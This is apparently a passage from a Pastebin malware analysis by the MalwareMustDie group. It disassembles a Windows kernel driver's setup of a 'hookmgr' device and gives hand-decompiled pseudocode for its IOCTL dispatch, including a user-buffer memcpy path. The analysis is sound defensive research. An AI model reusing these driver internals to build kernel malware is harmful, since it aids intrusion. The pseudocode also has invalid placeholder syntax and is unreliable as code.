  303. // The installation is reversed from entry point: 0x001403e -> 0x0011310
  304. // it creates the hook manager device as driver
  305. |       |   0x0001403e      8bff           mov edi, edi
  306. |       |   0x00014040      55             push ebp
  307. |       |   0x00014041      8bec           mov ebp, esp
  308. |       |   0x00014043      e8bdffffff     call 0x14005
  309. |       |   0x00014048      5d             pop ebp
  310. \       `=< 0x00014049      e9c2d2ffff     jmp 0x11310
  311.                   ↓ ↓ ↓ ↓ ↓
  312. |           0x00011310      8bff           mov edi, edi
  313. |           0x00011312      55             push ebp
  314. |           0x00011313      8bec           mov ebp, esp
  315. |           0x00011315      83ec0c         sub esp, 0xc
  316. |           0x00011318      c745f4101801.  mov dword [ebp-local_3], 0x11810 ; [0x11810:4]="\\Device\\hookmgr"
  317. |           0x0001131f      c745f8e01701.  mov dword [ebp-local_2], 0x117e0 ; [0x117e0:4]="\\DosDevices\\hookmgr"
  318. |           0x00011326      8b45f4         mov eax, dword [ebp-local_3] ; source = ebp-local_3
  319. |           0x00011329      50             push eax        ;  source
  320. |           0x0001132a      6828300100     push 0x13028    ;  dest
  321. |           0x0001132f      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  322. |           0x00011335      8b4df8         mov ecx, dword [ebp-local_2] ; src = ebp-local_2
  323. |           0x00011338      51             push ecx       ; src
  324. |           0x00011339      6830300100     push 0x13030   ; dest
  325. |           0x0001133e      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  326. |           0x00011344      6818300100     push 0x13018  ; Object Device (DeviceObject)
  327. |           0x00011349      6a00           push 0        ; excl bit
  328. |           0x0001134b      6a00           push 0        ; characteristic
  329. |           0x0001134d      6a15           push 0x15     ; type
  330. |           0x0001134f      6828300100     push 0x13028  ; name
  331. |           0x00011354      6a00           push 0        ; extention
  332. |           0x00011356      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  333. |           0x00011359      52             push edx      ; object
  334. |           0x0001135a      ff1520200100   call dword [0x12020] ; ntoskrnl.exe_IoCreateDevice
  335. |           0x00011360      8945fc         mov dword [ebp-local_1], eax
  336. |           0x00011363      837dfc00       cmp dword [ebp-local_1], 0
  337. |       ,=< 0x00011367      7c4a           jl 0x113b3
  338.  
  339. ////////////////////////////////
  340. symbolic link wrote & drv deletion....
  341. ////////////////////////////////
  342. |       |   0x00011369      6828300100     push 0x13028
  343. |       |   0x0001136e      6830300100     push 0x13030
  344. |       |   0x00011373      ff151c200100   call dword [sym.imp.ntoskrnl.exe_IoCreateSymbolicLink] ; ".A" @ 0x1201c
  345. |       |   0x00011379      8945fc         mov dword [ebp-local_1], eax
  346. |       |   0x0001137c      837dfc00       cmp dword [ebp-local_1], 0
  347. |      ,==< 0x00011380      7c24           jl 0x113a6
  348. |      ||   0x00011382      8b4508         mov eax, dword [ebp+arg_2]  ; [0x8:4]=4
  349. |      ||   0x00011385      c74070701001.  mov dword [eax + 0x70], 0x11070 ; [0x11070:4]=0x8b55ff8b
  350. |      ||   0x0001138c      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  351. |      ||   0x0001138f      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  352. |      ||   0x00011392      8b4270         mov eax, dword [edx + 0x70] ; [0x70:4]=0x65646f6d  ; 'p' ; "mode....$" @ 0x70
  353. |      ||   0x00011395      894140         mov dword [ecx + 0x40], eax
  354. |      ||   0x00011398      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  355. |      ||   0x0001139b      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  356. |      ||   0x0001139e      8b4240         mov eax, dword [edx + 0x40] ; [0x40:4]=0xeba1f0e  ; '@'
  357. |      ||   0x000113a1      894138         mov dword [ecx + 0x38], eax
  358. |     ,===< 0x000113a4      eb0d           jmp 0x113b3
  359. |     |`--> 0x000113a6      8b0d18300100   mov ecx, dword [0x13018]    ; [0x13018:4]=0
  360. |     | |   0x000113ac      51             push ecx
  361. |     | |   0x000113ad      ff1518200100   call dword [sym.imp.ntoskrnl.exe_IoDeleteDevice] ; sym.imp.ntoskrnl.exe_IoDeleteDevice
  362. |     | |   ; JMP XREF from 0x000113a4 (fcn.00011310)
  363. |     `-`-> 0x000113b3      8b45fc         mov eax, dword [ebp-local_1]
  364. |           0x000113b6      8be5           mov esp, ebp
  365. |           0x000113b8      5d             pop ebp
  366. \           0x000113b9      c20800         ret 8
  367.  
  368. ///////////////////////////////////
  369. Driver switches for actions
  370. //////////////////////////////////
  371. fn.0x011070 ;;
  372. int ({eax}, int[var_loc], PIRP Irp)
  373. {
  374.   ULONG_PTR  [sp-0x010] [bp-254]
  375.   ULONG_PTR  [sp+0x22C] [bp-18]
  376.   ULONG_PTR  [sp+0x23C] [bp-8]
  377.  
  378.   char var0x01 = [sp+0x00C] [bp-0x0238]
  379.   char var0x02 = [sp+0x004] [bp-0x0240]
  380.   char var0x04 = [sp+0x22C] [bp-0x018h]
  381.  
  382.   var0x02 = *(_BYTE *)0x012B0(Irp);  
  383.   if ( var0x02 == 14 )
  384.   {
  385.     switch ( {*(_DWORD *)(v9 + 12);} )
  386.     {
  387. /////////////////////////
  388.       case 0x224004:
  389. ////////////////////////
  390.         if ( v8 < 0xC )
  391.         {
  392.           var0x01 = -0xERR;
  393.         }
  394.         else
  395.         {
  396.           {-2} = 0;
  397.           ProbeForWrite(*(PVOID *)&{Irp->AssociatedIrp.MasterIrp;}->Type, {Irp->AssociatedIrp.MasterIrp;}->Flags, 1u);
  398.           memcpy(*(void **)&v11->Type, v11->MdlAddress, v11->Flags);
  399.           var0x01 = 0;
  400.           {-2} = -2;
  401.         }
  402.         break;
  403.  
  404. ////////////////////////
  405.       case 0x22400C:
  406. ////////////////////////
  407.         if ( !DWORD-0x1301C )
  408.           DWORD-0x1301C = (int)sub_11010();
  409.         if ( DWORD-0x1301C )
  410.         {
  411.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x1301C;
  412.           Irp->IoStatus.Information = 4;
  413.           var0x01 = 0;
  414.         }
  415.         else
  416.         {
  417.           var0x01 = -0xERR;
  418.         }
  419.         break;
  420.  
  421. /////////////////////////
  422.       case 0x224014:
  423. ////////////////////////
  424.         if ( !DWORD-0x13020 )
  425.           DWORD-0x13020 = (int)sub_11040();
  426.         if ( DWORD-0x13020 )
  427.         {
  428.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x13020;
  429.           Irp->IoStatus.Information = 4;
  430.           var0x01 = 0;
  431.         }
  432.         else
  433.         {
  434.           var0x01 = -0xERR;
  435.         }
  436.         break;
  437.  
  438. ////////////////////
  439.       default:
  440. ////////////////////
  441.         var0x01 = -0xERR;
  442.         break;
  443.     }
  444.   }
  445. ///////////////
  446.   else
  447. //////////////
  448.   {
  449.     var0x01 = 0;
  450.   }
  451.   var0x01{Irp->IoStatus.Status}
  452.   IofCompleteRequest(Irp, 0);
  453.   return 0;
  454. }
  455.  
  456. Explanation of the switch-case above is in kernelmode by the help from FireFox:
  457. http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4217&p=27791#p27792
  458.  
  459. #  @unixfreaxjp | #MalwareMustDie
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top